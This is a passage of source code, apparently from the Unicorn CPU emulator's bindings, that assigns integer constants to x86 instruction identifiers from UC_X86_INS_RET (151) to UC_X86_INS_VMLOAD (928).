UC_X86_INS_RET = 151; UC_X86_INS_ENCLS = 152; UC_X86_INS_ENCLU = 153; UC_X86_INS_ENTER = 154; UC_X86_INS_EXTRACTPS = 155; UC_X86_INS_EXTRQ = 156; UC_X86_INS_F2XM1 = 157; UC_X86_INS_LCALL = 158; UC_X86_INS_LJMP = 159; UC_X86_INS_FBLD = 160; UC_X86_INS_FBSTP = 161; UC_X86_INS_FCOMPP = 162; UC_X86_INS_FDECSTP = 163; UC_X86_INS_FEMMS = 164; UC_X86_INS_FFREE = 165; UC_X86_INS_FICOM = 166; UC_X86_INS_FICOMP = 167; UC_X86_INS_FINCSTP = 168; UC_X86_INS_FLDCW = 169; UC_X86_INS_FLDENV = 170; UC_X86_INS_FLDL2E = 171; UC_X86_INS_FLDL2T = 172; UC_X86_INS_FLDLG2 = 173; UC_X86_INS_FLDLN2 = 174; UC_X86_INS_FLDPI = 175; UC_X86_INS_FNCLEX = 176; UC_X86_INS_FNINIT = 177; UC_X86_INS_FNOP = 178; UC_X86_INS_FNSTCW = 179; UC_X86_INS_FNSTSW = 180; UC_X86_INS_FPATAN = 181; UC_X86_INS_FPREM = 182; UC_X86_INS_FPREM1 = 183; UC_X86_INS_FPTAN = 184; UC_X86_INS_FFREEP = 185; UC_X86_INS_FRNDINT = 186; UC_X86_INS_FRSTOR = 187; UC_X86_INS_FNSAVE = 188; UC_X86_INS_FSCALE = 189; UC_X86_INS_FSETPM = 190; UC_X86_INS_FSINCOS = 191; UC_X86_INS_FNSTENV = 192; UC_X86_INS_FXAM = 193; UC_X86_INS_FXRSTOR = 194; UC_X86_INS_FXRSTOR64 = 195; UC_X86_INS_FXSAVE = 196; UC_X86_INS_FXSAVE64 = 197; UC_X86_INS_FXTRACT = 198; UC_X86_INS_FYL2X = 199; UC_X86_INS_FYL2XP1 = 200; UC_X86_INS_MOVAPD = 201; UC_X86_INS_MOVAPS = 202; UC_X86_INS_ORPD = 203; UC_X86_INS_ORPS = 204; UC_X86_INS_VMOVAPD = 205; UC_X86_INS_VMOVAPS = 206; UC_X86_INS_XORPD = 207; UC_X86_INS_XORPS = 208; UC_X86_INS_GETSEC = 209; UC_X86_INS_HADDPD = 210; UC_X86_INS_HADDPS = 211; UC_X86_INS_HLT = 212; UC_X86_INS_HSUBPD = 213; UC_X86_INS_HSUBPS = 214; UC_X86_INS_IDIV = 215; UC_X86_INS_FILD = 216; UC_X86_INS_IMUL = 217; UC_X86_INS_IN = 218; UC_X86_INS_INC = 219; UC_X86_INS_INSB = 220; UC_X86_INS_INSERTPS = 221; UC_X86_INS_INSERTQ = 222; UC_X86_INS_INSD = 223; UC_X86_INS_INSW = 224; UC_X86_INS_INT = 225; UC_X86_INS_INT1 = 226; UC_X86_INS_INT3 = 227; UC_X86_INS_INTO = 228; UC_X86_INS_INVD = 229; UC_X86_INS_INVEPT = 230; UC_X86_INS_INVLPG = 231; UC_X86_INS_INVLPGA = 232; UC_X86_INS_INVPCID = 233; UC_X86_INS_INVVPID = 234; UC_X86_INS_IRET = 235; UC_X86_INS_IRETD = 236; UC_X86_INS_IRETQ = 237; UC_X86_INS_FISTTP = 238; UC_X86_INS_FIST = 239; UC_X86_INS_FISTP = 240; UC_X86_INS_UCOMISD = 241; UC_X86_INS_UCOMISS = 242; UC_X86_INS_VCOMISD = 243; UC_X86_INS_VCOMISS = 244; UC_X86_INS_VCVTSD2SS = 245; UC_X86_INS_VCVTSI2SD = 246; UC_X86_INS_VCVTSI2SS = 247; UC_X86_INS_VCVTSS2SD = 248; UC_X86_INS_VCVTTSD2SI = 249; UC_X86_INS_VCVTTSD2USI = 250; UC_X86_INS_VCVTTSS2SI = 251; UC_X86_INS_VCVTTSS2USI = 252; UC_X86_INS_VCVTUSI2SD = 253; UC_X86_INS_VCVTUSI2SS = 254; UC_X86_INS_VUCOMISD = 255; UC_X86_INS_VUCOMISS = 256; UC_X86_INS_JAE = 257; UC_X86_INS_JA = 258; UC_X86_INS_JBE = 259; UC_X86_INS_JB = 260; UC_X86_INS_JCXZ = 261; UC_X86_INS_JECXZ = 262; UC_X86_INS_JE = 263; UC_X86_INS_JGE = 264; UC_X86_INS_JG = 265; UC_X86_INS_JLE = 266; UC_X86_INS_JL = 267; UC_X86_INS_JMP = 268; UC_X86_INS_JNE = 269; UC_X86_INS_JNO = 270; UC_X86_INS_JNP = 271; UC_X86_INS_JNS = 272; UC_X86_INS_JO = 273; UC_X86_INS_JP = 274; UC_X86_INS_JRCXZ = 275; UC_X86_INS_JS = 276; UC_X86_INS_KANDB = 277; UC_X86_INS_KANDD = 278; UC_X86_INS_KANDNB = 279; UC_X86_INS_KANDND = 280; UC_X86_INS_KANDNQ = 281; UC_X86_INS_KANDNW = 282; UC_X86_INS_KANDQ = 283; UC_X86_INS_KANDW = 284; UC_X86_INS_KMOVB = 285; UC_X86_INS_KMOVD = 286; UC_X86_INS_KMOVQ = 287; UC_X86_INS_KMOVW = 288; UC_X86_INS_KNOTB = 289; UC_X86_INS_KNOTD = 290; UC_X86_INS_KNOTQ = 291; UC_X86_INS_KNOTW = 292; UC_X86_INS_KORB = 293; UC_X86_INS_KORD = 294; UC_X86_INS_KORQ = 295; UC_X86_INS_KORTESTB = 296; UC_X86_INS_KORTESTD = 297; UC_X86_INS_KORTESTQ = 298; UC_X86_INS_KORTESTW = 299; UC_X86_INS_KORW = 300; UC_X86_INS_KSHIFTLB = 301; UC_X86_INS_KSHIFTLD = 302; UC_X86_INS_KSHIFTLQ = 303; UC_X86_INS_KSHIFTLW = 304; UC_X86_INS_KSHIFTRB = 305; UC_X86_INS_KSHIFTRD = 306; UC_X86_INS_KSHIFTRQ = 307; UC_X86_INS_KSHIFTRW = 308; UC_X86_INS_KUNPCKBW = 309; UC_X86_INS_KXNORB = 310; UC_X86_INS_KXNORD = 311; UC_X86_INS_KXNORQ = 312; UC_X86_INS_KXNORW = 313; UC_X86_INS_KXORB = 314; UC_X86_INS_KXORD = 315; UC_X86_INS_KXORQ = 316; UC_X86_INS_KXORW = 317; UC_X86_INS_LAHF = 318; UC_X86_INS_LAR = 319; UC_X86_INS_LDDQU = 320; UC_X86_INS_LDMXCSR = 321; UC_X86_INS_LDS = 322; UC_X86_INS_FLDZ = 323; UC_X86_INS_FLD1 = 324; UC_X86_INS_FLD = 325; UC_X86_INS_LEA = 326; UC_X86_INS_LEAVE = 327; UC_X86_INS_LES = 328; UC_X86_INS_LFENCE = 329; UC_X86_INS_LFS = 330; UC_X86_INS_LGDT = 331; UC_X86_INS_LGS = 332; UC_X86_INS_LIDT = 333; UC_X86_INS_LLDT = 334; UC_X86_INS_LMSW = 335; UC_X86_INS_OR = 336; UC_X86_INS_SUB = 337; UC_X86_INS_XOR = 338; UC_X86_INS_LODSB = 339; UC_X86_INS_LODSD = 340; UC_X86_INS_LODSQ = 341; UC_X86_INS_LODSW = 342; UC_X86_INS_LOOP = 343; UC_X86_INS_LOOPE = 344; UC_X86_INS_LOOPNE = 345; UC_X86_INS_RETF = 346; UC_X86_INS_RETFQ = 347; UC_X86_INS_LSL = 348; UC_X86_INS_LSS = 349; UC_X86_INS_LTR = 350; UC_X86_INS_XADD = 351; UC_X86_INS_LZCNT = 352; UC_X86_INS_MASKMOVDQU = 353; UC_X86_INS_MAXPD = 354; UC_X86_INS_MAXPS = 355; UC_X86_INS_MAXSD = 356; UC_X86_INS_MAXSS = 357; UC_X86_INS_MFENCE = 358; UC_X86_INS_MINPD = 359; UC_X86_INS_MINPS = 360; UC_X86_INS_MINSD = 361; UC_X86_INS_MINSS = 362; UC_X86_INS_CVTPD2PI = 363; UC_X86_INS_CVTPI2PD = 364; UC_X86_INS_CVTPI2PS = 365; UC_X86_INS_CVTPS2PI = 366; UC_X86_INS_CVTTPD2PI = 367; UC_X86_INS_CVTTPS2PI = 368; UC_X86_INS_EMMS = 369; UC_X86_INS_MASKMOVQ = 370; UC_X86_INS_MOVD = 371; UC_X86_INS_MOVDQ2Q = 372; UC_X86_INS_MOVNTQ = 373; UC_X86_INS_MOVQ2DQ = 374; UC_X86_INS_MOVQ = 375; UC_X86_INS_PABSB = 376; UC_X86_INS_PABSD = 377; UC_X86_INS_PABSW = 378; UC_X86_INS_PACKSSDW = 379; UC_X86_INS_PACKSSWB = 380; UC_X86_INS_PACKUSWB = 381; UC_X86_INS_PADDB = 382; UC_X86_INS_PADDD = 383; UC_X86_INS_PADDQ = 384; UC_X86_INS_PADDSB = 385; UC_X86_INS_PADDSW = 386; UC_X86_INS_PADDUSB = 387; UC_X86_INS_PADDUSW = 388; UC_X86_INS_PADDW = 389; UC_X86_INS_PALIGNR = 390; UC_X86_INS_PANDN = 391; UC_X86_INS_PAND = 392; UC_X86_INS_PAVGB = 393; UC_X86_INS_PAVGW = 394; UC_X86_INS_PCMPEQB = 395; UC_X86_INS_PCMPEQD = 396; UC_X86_INS_PCMPEQW = 397; UC_X86_INS_PCMPGTB = 398; UC_X86_INS_PCMPGTD = 399; UC_X86_INS_PCMPGTW = 400; UC_X86_INS_PEXTRW = 401; UC_X86_INS_PHADDSW = 402; UC_X86_INS_PHADDW = 403; UC_X86_INS_PHADDD = 404; UC_X86_INS_PHSUBD = 405; UC_X86_INS_PHSUBSW = 406; UC_X86_INS_PHSUBW = 407; UC_X86_INS_PINSRW = 408; UC_X86_INS_PMADDUBSW = 409; UC_X86_INS_PMADDWD = 410; UC_X86_INS_PMAXSW = 411; UC_X86_INS_PMAXUB = 412; UC_X86_INS_PMINSW = 413; UC_X86_INS_PMINUB = 414; UC_X86_INS_PMOVMSKB = 415; UC_X86_INS_PMULHRSW = 416; UC_X86_INS_PMULHUW = 417; UC_X86_INS_PMULHW = 418; UC_X86_INS_PMULLW = 419; UC_X86_INS_PMULUDQ = 420; UC_X86_INS_POR = 421; UC_X86_INS_PSADBW = 422; UC_X86_INS_PSHUFB = 423; UC_X86_INS_PSHUFW = 424; UC_X86_INS_PSIGNB = 425; UC_X86_INS_PSIGND = 426; UC_X86_INS_PSIGNW = 427; UC_X86_INS_PSLLD = 428; UC_X86_INS_PSLLQ = 429; UC_X86_INS_PSLLW = 430; UC_X86_INS_PSRAD = 431; UC_X86_INS_PSRAW = 432; UC_X86_INS_PSRLD = 433; UC_X86_INS_PSRLQ = 434; UC_X86_INS_PSRLW = 435; UC_X86_INS_PSUBB = 436; UC_X86_INS_PSUBD = 437; UC_X86_INS_PSUBQ = 438; UC_X86_INS_PSUBSB = 439; UC_X86_INS_PSUBSW = 440; UC_X86_INS_PSUBUSB = 441; UC_X86_INS_PSUBUSW = 442; UC_X86_INS_PSUBW = 443; UC_X86_INS_PUNPCKHBW = 444; UC_X86_INS_PUNPCKHDQ = 445; UC_X86_INS_PUNPCKHWD = 446; UC_X86_INS_PUNPCKLBW = 447; UC_X86_INS_PUNPCKLDQ = 448; UC_X86_INS_PUNPCKLWD = 449; UC_X86_INS_PXOR = 450; UC_X86_INS_MONITOR = 451; UC_X86_INS_MONTMUL = 452; UC_X86_INS_MOV = 453; UC_X86_INS_MOVABS = 454; UC_X86_INS_MOVBE = 455; UC_X86_INS_MOVDDUP = 456; UC_X86_INS_MOVDQA = 457; UC_X86_INS_MOVDQU = 458; UC_X86_INS_MOVHLPS = 459; UC_X86_INS_MOVHPD = 460; UC_X86_INS_MOVHPS = 461; UC_X86_INS_MOVLHPS = 462; UC_X86_INS_MOVLPD = 463; UC_X86_INS_MOVLPS = 464; UC_X86_INS_MOVMSKPD = 465; UC_X86_INS_MOVMSKPS = 466; UC_X86_INS_MOVNTDQA = 467; UC_X86_INS_MOVNTDQ = 468; UC_X86_INS_MOVNTI = 469; UC_X86_INS_MOVNTPD = 470; UC_X86_INS_MOVNTPS = 471; UC_X86_INS_MOVNTSD = 472; UC_X86_INS_MOVNTSS = 473; UC_X86_INS_MOVSB = 474; UC_X86_INS_MOVSD = 475; UC_X86_INS_MOVSHDUP = 476; UC_X86_INS_MOVSLDUP = 477; UC_X86_INS_MOVSQ = 478; UC_X86_INS_MOVSS = 479; UC_X86_INS_MOVSW = 480; UC_X86_INS_MOVSX = 481; UC_X86_INS_MOVSXD = 482; UC_X86_INS_MOVUPD = 483; UC_X86_INS_MOVUPS = 484; UC_X86_INS_MOVZX = 485; UC_X86_INS_MPSADBW = 486; UC_X86_INS_MUL = 487; UC_X86_INS_MULPD = 488; UC_X86_INS_MULPS = 489; UC_X86_INS_MULSD = 490; UC_X86_INS_MULSS = 491; UC_X86_INS_MULX = 492; UC_X86_INS_FMUL = 493; UC_X86_INS_FIMUL = 494; UC_X86_INS_FMULP = 495; UC_X86_INS_MWAIT = 496; UC_X86_INS_NEG = 497; UC_X86_INS_NOP = 498; UC_X86_INS_NOT = 499; UC_X86_INS_OUT = 500; UC_X86_INS_OUTSB = 501; UC_X86_INS_OUTSD = 502; UC_X86_INS_OUTSW = 503; UC_X86_INS_PACKUSDW = 504; UC_X86_INS_PAUSE = 505; UC_X86_INS_PAVGUSB = 506; UC_X86_INS_PBLENDVB = 507; UC_X86_INS_PBLENDW = 508; UC_X86_INS_PCLMULQDQ = 509; UC_X86_INS_PCMPEQQ = 510; UC_X86_INS_PCMPESTRI = 511; UC_X86_INS_PCMPESTRM = 512; UC_X86_INS_PCMPGTQ = 513; UC_X86_INS_PCMPISTRI = 514; UC_X86_INS_PCMPISTRM = 515; UC_X86_INS_PCOMMIT = 516; UC_X86_INS_PDEP = 517; UC_X86_INS_PEXT = 518; UC_X86_INS_PEXTRB = 519; UC_X86_INS_PEXTRD = 520; UC_X86_INS_PEXTRQ = 521; UC_X86_INS_PF2ID = 522; UC_X86_INS_PF2IW = 523; UC_X86_INS_PFACC = 524; UC_X86_INS_PFADD = 525; UC_X86_INS_PFCMPEQ = 526; UC_X86_INS_PFCMPGE = 527; UC_X86_INS_PFCMPGT = 528; UC_X86_INS_PFMAX = 529; UC_X86_INS_PFMIN = 530; UC_X86_INS_PFMUL = 531; UC_X86_INS_PFNACC = 532; UC_X86_INS_PFPNACC = 533; UC_X86_INS_PFRCPIT1 = 534; UC_X86_INS_PFRCPIT2 = 535; UC_X86_INS_PFRCP = 536; UC_X86_INS_PFRSQIT1 = 537; UC_X86_INS_PFRSQRT = 538; UC_X86_INS_PFSUBR = 539; UC_X86_INS_PFSUB = 540; UC_X86_INS_PHMINPOSUW = 541; UC_X86_INS_PI2FD = 542; UC_X86_INS_PI2FW = 543; UC_X86_INS_PINSRB = 544; UC_X86_INS_PINSRD = 545; UC_X86_INS_PINSRQ = 546; UC_X86_INS_PMAXSB = 547; UC_X86_INS_PMAXSD = 548; UC_X86_INS_PMAXUD = 549; UC_X86_INS_PMAXUW = 550; UC_X86_INS_PMINSB = 551; UC_X86_INS_PMINSD = 552; UC_X86_INS_PMINUD = 553; UC_X86_INS_PMINUW = 554; UC_X86_INS_PMOVSXBD = 555; UC_X86_INS_PMOVSXBQ = 556; UC_X86_INS_PMOVSXBW = 557; UC_X86_INS_PMOVSXDQ = 558; UC_X86_INS_PMOVSXWD = 559; UC_X86_INS_PMOVSXWQ = 560; UC_X86_INS_PMOVZXBD = 561; UC_X86_INS_PMOVZXBQ = 562; UC_X86_INS_PMOVZXBW = 563; UC_X86_INS_PMOVZXDQ = 564; UC_X86_INS_PMOVZXWD = 565; UC_X86_INS_PMOVZXWQ = 566; UC_X86_INS_PMULDQ = 567; UC_X86_INS_PMULHRW = 568; UC_X86_INS_PMULLD = 569; UC_X86_INS_POP = 570; UC_X86_INS_POPAW = 571; UC_X86_INS_POPAL = 572; UC_X86_INS_POPCNT = 573; UC_X86_INS_POPF = 574; UC_X86_INS_POPFD = 575; UC_X86_INS_POPFQ = 576; UC_X86_INS_PREFETCH = 577; UC_X86_INS_PREFETCHNTA = 578; UC_X86_INS_PREFETCHT0 = 579; UC_X86_INS_PREFETCHT1 = 580; UC_X86_INS_PREFETCHT2 = 581; UC_X86_INS_PREFETCHW = 582; UC_X86_INS_PSHUFD = 583; UC_X86_INS_PSHUFHW = 584; UC_X86_INS_PSHUFLW = 585; UC_X86_INS_PSLLDQ = 586; UC_X86_INS_PSRLDQ = 587; UC_X86_INS_PSWAPD = 588; UC_X86_INS_PTEST = 589; UC_X86_INS_PUNPCKHQDQ = 590; UC_X86_INS_PUNPCKLQDQ = 591; UC_X86_INS_PUSH = 592; UC_X86_INS_PUSHAW = 593; UC_X86_INS_PUSHAL = 594; UC_X86_INS_PUSHF = 595; UC_X86_INS_PUSHFD = 596; UC_X86_INS_PUSHFQ = 597; UC_X86_INS_RCL = 598; UC_X86_INS_RCPPS = 599; UC_X86_INS_RCPSS = 600; UC_X86_INS_RCR = 601; UC_X86_INS_RDFSBASE = 602; UC_X86_INS_RDGSBASE = 603; UC_X86_INS_RDMSR = 604; UC_X86_INS_RDPMC = 605; UC_X86_INS_RDRAND = 606; UC_X86_INS_RDSEED = 607; UC_X86_INS_RDTSC = 608; UC_X86_INS_RDTSCP = 609; UC_X86_INS_ROL = 610; UC_X86_INS_ROR = 611; UC_X86_INS_RORX = 612; UC_X86_INS_ROUNDPD = 613; UC_X86_INS_ROUNDPS = 614; UC_X86_INS_ROUNDSD = 615; UC_X86_INS_ROUNDSS = 616; UC_X86_INS_RSM = 617; UC_X86_INS_RSQRTPS = 618; UC_X86_INS_RSQRTSS = 619; UC_X86_INS_SAHF = 620; UC_X86_INS_SAL = 621; UC_X86_INS_SALC = 622; UC_X86_INS_SAR = 623; UC_X86_INS_SARX = 624; UC_X86_INS_SBB = 625; UC_X86_INS_SCASB = 626; UC_X86_INS_SCASD = 627; UC_X86_INS_SCASQ = 628; UC_X86_INS_SCASW = 629; UC_X86_INS_SETAE = 630; UC_X86_INS_SETA = 631; UC_X86_INS_SETBE = 632; UC_X86_INS_SETB = 633; UC_X86_INS_SETE = 634; UC_X86_INS_SETGE = 635; UC_X86_INS_SETG = 636; UC_X86_INS_SETLE = 637; UC_X86_INS_SETL = 638; UC_X86_INS_SETNE = 639; UC_X86_INS_SETNO = 640; UC_X86_INS_SETNP = 641; UC_X86_INS_SETNS = 642; UC_X86_INS_SETO = 643; UC_X86_INS_SETP = 644; UC_X86_INS_SETS = 645; UC_X86_INS_SFENCE = 646; UC_X86_INS_SGDT = 647; UC_X86_INS_SHA1MSG1 = 648; UC_X86_INS_SHA1MSG2 = 649; UC_X86_INS_SHA1NEXTE = 650; UC_X86_INS_SHA1RNDS4 = 651; UC_X86_INS_SHA256MSG1 = 652; UC_X86_INS_SHA256MSG2 = 653; UC_X86_INS_SHA256RNDS2 = 654; UC_X86_INS_SHL = 655; UC_X86_INS_SHLD = 656; UC_X86_INS_SHLX = 657; UC_X86_INS_SHR = 658; UC_X86_INS_SHRD = 659; UC_X86_INS_SHRX = 660; UC_X86_INS_SHUFPD = 661; UC_X86_INS_SHUFPS = 662; UC_X86_INS_SIDT = 663; UC_X86_INS_FSIN = 664; UC_X86_INS_SKINIT = 665; UC_X86_INS_SLDT = 666; UC_X86_INS_SMSW = 667; UC_X86_INS_SQRTPD = 668; UC_X86_INS_SQRTPS = 669; UC_X86_INS_SQRTSD = 670; UC_X86_INS_SQRTSS = 671; UC_X86_INS_FSQRT = 672; UC_X86_INS_STAC = 673; UC_X86_INS_STC = 674; UC_X86_INS_STD = 675; UC_X86_INS_STGI = 676; UC_X86_INS_STI = 677; UC_X86_INS_STMXCSR = 678; UC_X86_INS_STOSB = 679; UC_X86_INS_STOSD = 680; UC_X86_INS_STOSQ = 681; UC_X86_INS_STOSW = 682; UC_X86_INS_STR = 683; UC_X86_INS_FST = 684; UC_X86_INS_FSTP = 685; UC_X86_INS_FSTPNCE = 686; UC_X86_INS_FXCH = 687; UC_X86_INS_SUBPD = 688; UC_X86_INS_SUBPS = 689; UC_X86_INS_FSUBR = 690; UC_X86_INS_FISUBR = 691; UC_X86_INS_FSUBRP = 692; UC_X86_INS_SUBSD = 693; UC_X86_INS_SUBSS = 694; UC_X86_INS_FSUB = 695; UC_X86_INS_FISUB = 696; UC_X86_INS_FSUBP = 697; UC_X86_INS_SWAPGS = 698; UC_X86_INS_SYSCALL = 699; UC_X86_INS_SYSENTER = 700; UC_X86_INS_SYSEXIT = 701; UC_X86_INS_SYSRET = 702; UC_X86_INS_T1MSKC = 703; UC_X86_INS_TEST = 704; UC_X86_INS_UD2 = 705; UC_X86_INS_FTST = 706; UC_X86_INS_TZCNT = 707; UC_X86_INS_TZMSK = 708; UC_X86_INS_FUCOMPI = 709; UC_X86_INS_FUCOMI = 710; UC_X86_INS_FUCOMPP = 711; UC_X86_INS_FUCOMP = 712; UC_X86_INS_FUCOM = 713; UC_X86_INS_UD2B = 714; UC_X86_INS_UNPCKHPD = 715; UC_X86_INS_UNPCKHPS = 716; UC_X86_INS_UNPCKLPD = 717; UC_X86_INS_UNPCKLPS = 718; UC_X86_INS_VADDPD = 719; UC_X86_INS_VADDPS = 720; UC_X86_INS_VADDSD = 721; UC_X86_INS_VADDSS = 722; UC_X86_INS_VADDSUBPD = 723; UC_X86_INS_VADDSUBPS = 724; UC_X86_INS_VAESDECLAST = 725; UC_X86_INS_VAESDEC = 726; UC_X86_INS_VAESENCLAST = 727; UC_X86_INS_VAESENC = 728; UC_X86_INS_VAESIMC = 729; UC_X86_INS_VAESKEYGENASSIST = 730; UC_X86_INS_VALIGND = 731; UC_X86_INS_VALIGNQ = 732; UC_X86_INS_VANDNPD = 733; UC_X86_INS_VANDNPS = 734; UC_X86_INS_VANDPD = 735; UC_X86_INS_VANDPS = 736; UC_X86_INS_VBLENDMPD = 737; UC_X86_INS_VBLENDMPS = 738; UC_X86_INS_VBLENDPD = 739; UC_X86_INS_VBLENDPS = 740; UC_X86_INS_VBLENDVPD = 741; UC_X86_INS_VBLENDVPS = 742; UC_X86_INS_VBROADCASTF128 = 743; UC_X86_INS_VBROADCASTI32X4 = 744; UC_X86_INS_VBROADCASTI64X4 = 745; UC_X86_INS_VBROADCASTSD = 746; UC_X86_INS_VBROADCASTSS = 747; UC_X86_INS_VCMPPD = 748; UC_X86_INS_VCMPPS = 749; UC_X86_INS_VCMPSD = 750; UC_X86_INS_VCMPSS = 751; UC_X86_INS_VCOMPRESSPD = 752; UC_X86_INS_VCOMPRESSPS = 753; UC_X86_INS_VCVTDQ2PD = 754; UC_X86_INS_VCVTDQ2PS = 755; UC_X86_INS_VCVTPD2DQX = 756; UC_X86_INS_VCVTPD2DQ = 757; UC_X86_INS_VCVTPD2PSX = 758; UC_X86_INS_VCVTPD2PS = 759; UC_X86_INS_VCVTPD2UDQ = 760; UC_X86_INS_VCVTPH2PS = 761; UC_X86_INS_VCVTPS2DQ = 762; UC_X86_INS_VCVTPS2PD = 763; UC_X86_INS_VCVTPS2PH = 764; UC_X86_INS_VCVTPS2UDQ = 765; UC_X86_INS_VCVTSD2SI = 766; UC_X86_INS_VCVTSD2USI = 767; UC_X86_INS_VCVTSS2SI = 768; UC_X86_INS_VCVTSS2USI = 769; UC_X86_INS_VCVTTPD2DQX = 770; UC_X86_INS_VCVTTPD2DQ = 771; UC_X86_INS_VCVTTPD2UDQ = 772; UC_X86_INS_VCVTTPS2DQ = 773; UC_X86_INS_VCVTTPS2UDQ = 774; UC_X86_INS_VCVTUDQ2PD = 775; UC_X86_INS_VCVTUDQ2PS = 776; UC_X86_INS_VDIVPD = 777; UC_X86_INS_VDIVPS = 778; UC_X86_INS_VDIVSD = 779; UC_X86_INS_VDIVSS = 780; UC_X86_INS_VDPPD = 781; UC_X86_INS_VDPPS = 782; UC_X86_INS_VERR = 783; UC_X86_INS_VERW = 784; UC_X86_INS_VEXP2PD = 785; UC_X86_INS_VEXP2PS = 786; UC_X86_INS_VEXPANDPD = 787; UC_X86_INS_VEXPANDPS = 788; UC_X86_INS_VEXTRACTF128 = 789; UC_X86_INS_VEXTRACTF32X4 = 790; UC_X86_INS_VEXTRACTF64X4 = 791; UC_X86_INS_VEXTRACTI128 = 792; UC_X86_INS_VEXTRACTI32X4 = 793; UC_X86_INS_VEXTRACTI64X4 = 794; UC_X86_INS_VEXTRACTPS = 795; UC_X86_INS_VFMADD132PD = 796; UC_X86_INS_VFMADD132PS = 797; UC_X86_INS_VFMADDPD = 798; UC_X86_INS_VFMADD213PD = 799; UC_X86_INS_VFMADD231PD = 800; UC_X86_INS_VFMADDPS = 801; UC_X86_INS_VFMADD213PS = 802; UC_X86_INS_VFMADD231PS = 803; UC_X86_INS_VFMADDSD = 804; UC_X86_INS_VFMADD213SD = 805; UC_X86_INS_VFMADD132SD = 806; UC_X86_INS_VFMADD231SD = 807; UC_X86_INS_VFMADDSS = 808; UC_X86_INS_VFMADD213SS = 809; UC_X86_INS_VFMADD132SS = 810; UC_X86_INS_VFMADD231SS = 811; UC_X86_INS_VFMADDSUB132PD = 812; UC_X86_INS_VFMADDSUB132PS = 813; UC_X86_INS_VFMADDSUBPD = 814; UC_X86_INS_VFMADDSUB213PD = 815; UC_X86_INS_VFMADDSUB231PD = 816; UC_X86_INS_VFMADDSUBPS = 817; UC_X86_INS_VFMADDSUB213PS = 818; UC_X86_INS_VFMADDSUB231PS = 819; UC_X86_INS_VFMSUB132PD = 820; UC_X86_INS_VFMSUB132PS = 821; UC_X86_INS_VFMSUBADD132PD = 822; UC_X86_INS_VFMSUBADD132PS = 823; UC_X86_INS_VFMSUBADDPD = 824; UC_X86_INS_VFMSUBADD213PD = 825; UC_X86_INS_VFMSUBADD231PD = 826; UC_X86_INS_VFMSUBADDPS = 827; UC_X86_INS_VFMSUBADD213PS = 828; UC_X86_INS_VFMSUBADD231PS = 829; UC_X86_INS_VFMSUBPD = 830; UC_X86_INS_VFMSUB213PD = 831; UC_X86_INS_VFMSUB231PD = 832; UC_X86_INS_VFMSUBPS = 833; UC_X86_INS_VFMSUB213PS = 834; UC_X86_INS_VFMSUB231PS = 835; UC_X86_INS_VFMSUBSD = 836; UC_X86_INS_VFMSUB213SD = 837; UC_X86_INS_VFMSUB132SD = 838; UC_X86_INS_VFMSUB231SD = 839; UC_X86_INS_VFMSUBSS = 840; UC_X86_INS_VFMSUB213SS = 841; UC_X86_INS_VFMSUB132SS = 842; UC_X86_INS_VFMSUB231SS = 843; UC_X86_INS_VFNMADD132PD = 844; UC_X86_INS_VFNMADD132PS = 845; UC_X86_INS_VFNMADDPD = 846; UC_X86_INS_VFNMADD213PD = 847; UC_X86_INS_VFNMADD231PD = 848; UC_X86_INS_VFNMADDPS = 849; UC_X86_INS_VFNMADD213PS = 850; UC_X86_INS_VFNMADD231PS = 851; UC_X86_INS_VFNMADDSD = 852; UC_X86_INS_VFNMADD213SD = 853; UC_X86_INS_VFNMADD132SD = 854; UC_X86_INS_VFNMADD231SD = 855; UC_X86_INS_VFNMADDSS = 856; UC_X86_INS_VFNMADD213SS = 857; UC_X86_INS_VFNMADD132SS = 858; UC_X86_INS_VFNMADD231SS = 859; UC_X86_INS_VFNMSUB132PD = 860; UC_X86_INS_VFNMSUB132PS = 861; UC_X86_INS_VFNMSUBPD = 862; UC_X86_INS_VFNMSUB213PD = 863; UC_X86_INS_VFNMSUB231PD = 864; UC_X86_INS_VFNMSUBPS = 865; UC_X86_INS_VFNMSUB213PS = 866; UC_X86_INS_VFNMSUB231PS = 867; UC_X86_INS_VFNMSUBSD = 868; UC_X86_INS_VFNMSUB213SD = 869; UC_X86_INS_VFNMSUB132SD = 870; UC_X86_INS_VFNMSUB231SD = 871; UC_X86_INS_VFNMSUBSS = 872; UC_X86_INS_VFNMSUB213SS = 873; UC_X86_INS_VFNMSUB132SS = 874; UC_X86_INS_VFNMSUB231SS = 875; UC_X86_INS_VFRCZPD = 876; UC_X86_INS_VFRCZPS = 877; UC_X86_INS_VFRCZSD = 878; UC_X86_INS_VFRCZSS = 879; UC_X86_INS_VORPD = 880; UC_X86_INS_VORPS = 881; UC_X86_INS_VXORPD = 882; UC_X86_INS_VXORPS = 883; UC_X86_INS_VGATHERDPD = 884; UC_X86_INS_VGATHERDPS = 885; UC_X86_INS_VGATHERPF0DPD = 886; UC_X86_INS_VGATHERPF0DPS = 887; UC_X86_INS_VGATHERPF0QPD = 888; UC_X86_INS_VGATHERPF0QPS = 889; UC_X86_INS_VGATHERPF1DPD = 890; UC_X86_INS_VGATHERPF1DPS = 891; UC_X86_INS_VGATHERPF1QPD = 892; UC_X86_INS_VGATHERPF1QPS = 893; UC_X86_INS_VGATHERQPD = 894; UC_X86_INS_VGATHERQPS = 895; UC_X86_INS_VHADDPD = 896; UC_X86_INS_VHADDPS = 897; UC_X86_INS_VHSUBPD = 898; UC_X86_INS_VHSUBPS = 899; UC_X86_INS_VINSERTF128 = 900; UC_X86_INS_VINSERTF32X4 = 901; UC_X86_INS_VINSERTF32X8 = 902; UC_X86_INS_VINSERTF64X2 = 903; UC_X86_INS_VINSERTF64X4 = 904; UC_X86_INS_VINSERTI128 = 905; UC_X86_INS_VINSERTI32X4 = 906; UC_X86_INS_VINSERTI32X8 = 907; UC_X86_INS_VINSERTI64X2 = 908; UC_X86_INS_VINSERTI64X4 = 909; UC_X86_INS_VINSERTPS = 910; UC_X86_INS_VLDDQU = 911; UC_X86_INS_VLDMXCSR = 912; UC_X86_INS_VMASKMOVDQU = 913; UC_X86_INS_VMASKMOVPD = 914; UC_X86_INS_VMASKMOVPS = 915; UC_X86_INS_VMAXPD = 916; UC_X86_INS_VMAXPS = 917; UC_X86_INS_VMAXSD = 918; UC_X86_INS_VMAXSS = 919; UC_X86_INS_VMCALL = 920; UC_X86_INS_VMCLEAR = 921; UC_X86_INS_VMFUNC = 922; UC_X86_INS_VMINPD = 923; UC_X86_INS_VMINPS = 924; UC_X86_INS_VMINSD = 925; UC_X86_INS_VMINSS = 926; UC_X86_INS_VMLAUNCH = 927; UC_X86_INS_VMLOAD = 928; 